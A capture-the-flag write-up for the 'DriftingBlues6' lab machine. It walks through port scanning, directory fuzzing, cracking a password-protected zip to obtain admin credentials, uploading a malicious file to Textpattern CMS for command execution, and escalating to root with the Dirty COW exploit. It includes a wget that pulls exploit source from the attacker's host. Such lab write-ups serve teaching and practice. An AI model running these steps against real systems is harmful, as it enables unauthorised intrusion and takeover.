Post

DriftingBlues6

The exploitation of the “DriftingBlues6” box involved several critical steps. First, intelligence gathering was conducted through a port scan using the nmap tool, identifying open ports such as 80. Enumeration revealed the presence of a Textpattern CMS. Through directory fuzzing and a file search, a zip file named “spammer.zip” was found. After cracking the zip password, credentials were extracted, which provided access to the Textpattern admin panel. A malicious file was then uploaded, leading to remote command execution. During post-exploitation, a vulnerable Linux kernel version was identified, and privilege escalation was achieved by using the Dirty Cow exploit, leading to root access. The process included techniques for exploiting web vulnerabilities, file uploads, and privilege escalation, culminating in total system access and the retrieval of proof files.

Overview

graph TD
    A[Intelligence Gathering]
    A --> B[Port Scan > Port 80]
    B --> C[Enumeration: HTTP > Textpattern CMS]
    C --> D[Exploitation > Zip File Cracking > Insecure File Upload]
    D --> E[Post-Exploitation: Privilege Escalation using Dirty Cow]
    E --> F[Root Shell Access]

1. Information Gathering

Port Scan

1
sudo nmap -sC -sV -p-  192.168.169.219 -T5 -v

Output

1
2
3
4
5
6
7
8
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.22 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
| http-robots.txt: 1 disallowed entry 
|_/textpattern/textpattern
|_http-title: driftingblues
|_http-server-header: Apache/2.2.22 (Debian)

2. Enumeration

Port 80

Untitled

Source Page

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<!DOCTYPE html>
<html>
<title>driftingblues</title>
<body class="gbody">
<style>
.gbody {
	background-color: #f4ecd8;
	width: 1000px;
	margin: 40px auto;
	font-family: arial;
	font-size: 20px;
	   }

.gempty1 {
	display: inline-block;
	width: 1000px;
	height: 10px;
	border-bottom: solid 1px #000000;
	}

.gempty {
	display: inline-block;
	width: 1000px;
	height: 70px;
	}
	
</style>
<span class="main1">
<h1>Drifting Blues Tech
<h2>please don't hack
<h2>enough is enough!!!
<br><br><img src="db.png">
</span>
<span class="gempty"></span>
</body>
</html>
<!-- 
please hack vvmlist.github.io instead
he and their army always hacking us -->

directory fuzzing

1
gobuster dir -u http://192.168.169.219 -w /usr/share/wordlists/dirb/big.txt -t 40
1
2
3
4
5
6
7
8
9
10
11
12
13
14
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 292]
/.htaccess            (Status: 403) [Size: 292]
/cgi-bin/             (Status: 403) [Size: 291]
/db                   (Status: 200) [Size: 53656]
/index                (Status: 200) [Size: 750]
/robots               (Status: 200) [Size: 110]
/robots.txt           (Status: 200) [Size: 110]
/server-status        (Status: 403) [Size: 296]
/textpattern          (Status: 301) [Size: 324] [--> http://192.168.169.219/textpattern/]
Progress: 20469 / 20470 (100.00%)

robots.txt

Untitled

Discovered the Textpattern CMS

Untitled

http://192.168.169.219/textpattern/textpattern/ //requesting username and password for the admin page

Untitled

search for files with a .zip extension

1
feroxbuster -u http://192.168.169.219/ -k -C 404,403,500 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x zip
1
2
3
4
5
6
7
200      GET      212l     1206w    97264c http://192.168.169.219/db.png
200      GET       76l       75w      750c http://192.168.169.219/index
200      GET       76l       75w      750c http://192.168.169.219/
200      GET      212l     1206w    97264c http://192.168.169.219/db
200      GET        5l       14w      110c http://192.168.169.219/robots
200      GET        2l        7w      227c http://192.168.169.219/spammer
200      GET        2l        7w      227c http://192.168.169.219/spammer.zip

spammer.zip

Untitled

zip file requests password

Untitled

Crack the hash using the John tool

1
zip2john spammer.zip > hash                                  

hash

1
spammer.zip/creds.txt:$pkzip$1*1*2*0*1b*f*b003611d*0*27*0*1b*b003*2d41804a5ea9a60b1769d045bfb94c71382b2e5febf63bda08a56c*$/pkzip$:creds.txt:spammer.zip::spammer.zip

crack

1
john hash 

myspace4 (spammer.zip/creds.txt)

Credentials

Untitled

mayer:lionheart

3. Exploitation

Access the admin panel

Untitled

Upload file

Create the malicious file and set my IP.

Untitled

http://192.168.169.219/textpattern/textpattern/index.php?event=file

Untitled

Accessed the file at http://192.168.169.219/textpattern/files/

Untitled

Initial Access

Untitled

4. Post-Exploitation

Kernel Vulnerability

1
uname -a

Linux driftingblues 3.2.0-4-amd64 #1 SMP Debian 3.2.78-1 x86_64 GNU/Linux

Linux Kernel 2.6.22 < 3.9 - ‘Dirty COW’ ‘PTRACE_POKEDATA’ Race Condition Privilege Escalation (/etc/passwd Method)

1
2
wget http://192.168.45.248/40839.c
gcc -pthread 40839.c -o dirtycow -lcrypt

Untitled

Root Access

image.png

This post is licensed under CC BY 4.0 by the author.